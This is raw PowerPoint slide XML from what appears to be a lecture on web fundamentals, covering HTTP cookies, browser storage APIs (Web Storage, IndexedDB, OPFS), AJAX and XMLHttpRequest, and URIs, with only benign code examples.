        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8486324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dirty="0"/>
              <a:t>HTTP Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are small information containers that a web server can store on a web client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are set by the server by including the “Set-Cookie” header field in a reply:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Set-Cookie: USER=foo; SHIPPING=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fedex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; path=/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are passed (as part of the “Cookie” header field) in every further transaction with the site that set the cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Cookie: USER=foo; SHIPPING=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fedex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20564533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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are usually used to maintain “state” across separate HTTP transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User preferences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Status of multi-step processes (e.g., shopping cart applications)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session token stored as a result of a username/password authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are accessible (e.g., through JavaScript) only by the site that set them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14337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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721925" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cookie can have a number of fields:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;name&gt;=&lt;value&gt;: generic data (only required field)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>expires=&lt;date&gt;: expiration date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path=&lt;path&gt;: set of resources to which the cookie applies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain=&lt;domain name&gt;: by default set to the hostname, but it could specify a more generic domain (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure: flag that forces the cookie to be sent over secure connections only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: flag that specifies that a cookie should not be accessible to client-side scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are limitations to the number of cookies that a server can set</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19644764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09F5-D132-2C64-6780-3EF264927C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8D30D1-0D0F-D20D-1934-E3D69799945A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web Storage APIs allow for the storage of key/value pairs of string data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sessionStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API stores information for the duration of a session (it is deleted when the tab is closed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit: 5 MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API stores information permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit: 5MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35711284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40E4-EE04-1E7E-907E-6C7F14095B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IndexedDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905D827-A386-6D62-1CB8-085FB7DC404C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IndexedDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> storage mechanism allows for larger and more structured storage of client-side information, including binary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The data is represented by JSON objects stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ObjectStores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storage limits depend on the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be based on a percentage of the available disk space (e.g., 60% of the available disk space)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be a fixed amount (e.g., 100MB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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53839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71648-55CD-CB76-7609-A750D6A92B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin-Private File System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A32D1C30-D635-1E61-61BA-043B62E964B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The OPFS API allows a website to create and maintain a private file system on the client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The information survives sessions, but it is deleted when the user requests the deletion of website content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30006975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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1468419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AJAX (Asynchronous JavaScript and XML) is a mechanism to modify a web page based on the result of a request, but without the need of explicitly user action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It relies on two basic concepts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript-based DOM manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The XML-HTTP Request object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40966430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396" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XML HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The XML HTTP Request object was introduced to allow JavaScript code to retrieve data from a server the execution of queries from JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http_request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data was originally in XML format but is it more commonly in JSON format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> concept has been extended by the JavaScript fetch() API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711592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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>URIs, URLs, URNs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A Uniform Resource Identifier is a string that identifies a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A Uniform Resource Locator is an identifier that contains enough information to access the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A Uniform Resource Names is used to identify an entity regardless of the fact that the entity is accessible or even that it exists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2897340230"/>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446" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Requesting A Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469447" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using the “onreadystatechange” property of an XML-HTTP request object one can set the action to be performed when the result of a query is received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http_request.onreadystatechange = function(){</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  code here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Then, one can execute the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http_request.open('GET', 'http://www.foo.come/show.php?keyword=foo', true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note that the third parameter indicates that the request is asynchronous, that is, the execution of JavaScript will proceed while the requested document is being downloaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21936549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492" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Waiting For The Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471493" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function specified using the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” property will be called at any change in the request status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0 (uninitialized: Object is not initialized with data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 (loading: Object is loading its data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 (loaded: Object has finished loading its data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3 (interactive: User can interact with the object even though it is not fully loaded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 (complete: Object is completely initialized)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function will usually wait until the status is “complete”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http_request.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == 4) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  operates on data} else {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  not ready, return}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17908122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516" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modifying A Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1472517" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After having received the document (and having checked for a successful return code -- 200) the content of the request can be accessed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>As a string by calling: http_request.responseText</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>As an XMLDocument object: http_request.responseXML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In this case the object can be modified using the JavaScript DOM interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17793613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C71D-30D3-57B6-E536-FDABEC2627FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Fetch Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96195360-6730-BDCC-2477-3095677FB4A2}"/>
              </a:ext>
            </a:extLst>
